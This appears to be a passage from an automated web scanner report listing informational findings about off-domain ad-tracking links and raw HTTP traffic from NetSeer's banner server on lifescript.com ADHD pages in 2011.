http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07162024825811386&cpos=8&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.03321073576807976&cpos=1&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.03889354318380356&cpos=7&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.15707257390022278&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14457887411117554&cpos=5&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11372934281826019&cpos=4&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04665462300181389&cpos=6&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Symptoms+of+Anxiety+Disorder&chash=-8307493560803150152&cscr=0.09607640653848648&cpos=3&creg=0&cnads=20&cpc=2.430000066757202&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1465&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fq%3B242224824%3B0-0%3B3%3B31210306%3B4307-300%2F250%3B37820453%2F37838301%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Bdcopt%3Dist%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=250&adw=300&frd=1311276303096 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;tile=3;sz=300x250,300x600;frId=ad_3_1;ord=101352252258050
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fea24c3c932bcd7,1311276272777,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276272779,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvZG9jdG9yLXJlY29tbWVuZGVkX3RpcHNfZm9yX3dvbWVuX3dpdGhfYWRoZC5hc3B4,US-TX-623-Dallas,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fea24c3c932bcd7,1311276272777,&1091,990,www.lifescript.com,6,2,1,imp3fe01b3dd0c290bb,1311276297328,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:57 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:57 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276297329,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,6,2"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:57 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:24:56 GMT
Content-Length: 11615

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.03321073576807976&cpos=1&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p1_r1_c1">
                                       ADHD Help
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r2_c2">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.15707257390022278&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p2_r2_c2">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r3_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Symptoms+of+Anxiety+Disorder&chash=-8307493560803150152&cscr=0.09607640653848648&cpos=3&creg=0&cnads=20&cpc=2.430000066757202&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p3_r3_c3">
                                       Symptoms of Anxiety Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r4_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11372934281826019&cpos=4&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p4_r4_c4">
                                       ADHD in Adults
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r5_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14457887411117554&cpos=5&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p5_r5_c5">
                                       ADHD Treatment
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r6_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04665462300181389&cpos=6&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p6_r6_c6">
                                       Hyperactivity Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p7_r7_c7">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.03889354318380356&cpos=7&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p7_r7_c7">
                                       ADHD Information
                                       </a>
...[SNIP]...
<td id="cpts_c_p8_r8_c8">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;242224824;0-0;3;31210306;4307-300/250;37820453/37838301/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;dcopt=ist;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=990&iid=imp3fe01b3dd0c290bb&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07162024825811386&cpos=8&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p8_r8_c8">
                                       ADHD Disorder
                                       </a>
...[SNIP]...

18.54. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fd99cd273cceae2&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADD+and+ADHD+Symptoms&chash=-4953049157564972247&cscr=0.06330152601003647&cpos=2&creg=0&cnads=12&cpc=5.980000019073486&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fd99cd273cceae2&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07162024825811386&cpos=4&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fd99cd273cceae2&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.15707257390022278&cpos=3&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fd99cd273cceae2&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14457887411117554&cpos=6&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fd99cd273cceae2&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11372934281826019&cpos=1&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fd99cd273cceae2&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04665462300181389&cpos=5&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=101352252258050

Response

18.55. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Ft%3B242224827%3B0-0%3B1%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276208478

The response contains the following links to other domains:

